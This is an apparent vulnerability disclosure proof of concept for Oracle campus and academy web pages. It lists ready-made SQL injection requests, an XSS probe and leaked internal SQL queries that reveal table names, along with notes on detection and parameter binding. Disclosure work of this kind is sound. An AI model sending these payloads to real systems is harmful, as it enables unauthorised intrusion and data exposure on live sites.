Proof of Concept:
=================
The SQL injection vulnerability can be exploited by remote attackers without user interaction. For demonstration or to reproduce ...

https://campus.oracle.com/campus/HR/emea1-events-remove3.jsp?select1='+ (select convert(int,CHAR(95)+ CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

https://campus.oracle.com/campus/HR/us-jobdesc.jsp?select2='+ (select convert(int,CHAR(95)+ CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&Submit=Go

https://academy.oracle.com/pls/html/wwv_flow.show
POST data:
f01=false&f02=ASC&p_flow_id=300&p_flow_step_id=2&p_instance=3793763020344869&p_request=APXWGT&p_widget_action=COLUMN_ORDER&p_widget_mod=ACTION&p_widget_name=worksheet&x01=1%27%22&x02=9823900149811628

Note: the CHAR() codes in the first two requests decode to the fixed marker string _!@2dilemma, wrapped in a convert(int, ...) call so that the database raises a type-conversion error if the parameter value is evaluated as SQL. The third request only appends a quote pair (%27%22) to x01. Requests of this shape against select1, select2 and x01 stand out in web-server logs, and the fix on the application side is to bind these parameters instead of concatenating them into the statement.

XSS
https://campus.oracle.com/campus/HR/cn-profile-direct.jsp?flag='"-->

A few SQL queries that can be seen in the page source:

SELECT class_id,doc_code,to_char(class_date,NVL(wc.date_format,'DD-MON-YYYY')) dates,
       seats_avail, cl.city, cl.state, customer_sat_flag, deep_link_info, ed_center_id,
       cl.location_id, cl.location_code,loc_type, spoken_language, course_id,
       activity_version_id ,class_start_time,class_end_time, class_duration,
       oat.translation_attributes audiencetype_attributes, cl.timezone timezone,
       cl.parent_org_id, cl.territory_code
FROM LQ_CLASS_SEARCH cl,OTA_AUDIENCE_TYPES oat, WDDI_COUNTRY wc ,MAP_URLS mu
WHERE doc_code = ( SELECT easi_code FROM COURSES WHERE ID = 'D67020GC20' AND org_id = 1001 )
  AND mu.org_id(+) = cl.org_id
  AND mu.city(+) = cl.city
  AND mu.state(+) = cl.state
  AND mu.location_code(+) = cl.location_code
  AND cl.org_id =1001
  AND wc.org_id = cl.org_id
  AND oat.audience_code = cl.audience_type
  AND EXISTS ( SELECT 1
               FROM WDDI_AUDIENCE_TYPES_MAP watm, WDDI_AUDIENCE_TYPES wat , OTA_AUDIENCE_TYPES oat, WDDI_OTA_AUDIENCE_MAPS woam
               WHERE wat.audience_type_id IN (4,4)
                 AND watm.org_id = 1
                 AND watm.course_id = 'D67020GC20'
                 AND wat.audience_type_id = watm.audience_type_id
                 AND oat.audience_code = cl.audience_type
                 AND woam.ota_audience_id = oat.audience_id
                 AND woam.wddi_audience_id = watm.audience_type_id )
ORDER BY cl.class_date,cl.state,cl.city

SELECT /*+ FIRST_ROWS PUSH_SUBQ */
       WEBREG_COURSE_RESULTSCSS.getSortOrder(c.org_id,c.coursetitle,c.id,c.easi_code,c.short_desc,'',m.promotion_start_date,m.promotion_end_date,m.promotional,m.popularity),
       c.id, lowercase, deliverytype, short_desc,ekit_yn
FROM COURSES c ,COURSE_METADATA m ,Related_types rt ,
     ( SELECT watm.course_id
       FROM wddi_audience_types_map watm, wddi_audience_types wat
       WHERE wat.audience_type_id IN (4,4)
         AND watm.org_id = 1
         AND wat.audience_type_id = watm.audience_type_id ) w1
where c.org_id = 1001
  AND w1.course_id = c.id
  AND c.activity_status=2
  AND NVL(c.deliverysubtype,0) !=9
  AND m.org_id = c.org_id
  AND m.easi_code = c.easi_code
  AND rt.deltype_id = c.DELIVERYTYPE
ORDER BY 1 , rt.ORDER_ID, WEBREG_COURSE_RESULTSCSS.getPromotional(m.promotion_start_date,m.promotion_end_date,m.promotional) desc, m.popularity asc, id desc

Note: both statements reach the browser with table, column and package names intact, and with values such as the course ID and org_id written into the SQL text as literals rather than bound as parameters. Whether those literals come from request input is not visible here, but emitting the statements in page source gives away the schema in either case and should be removed from the rendered output.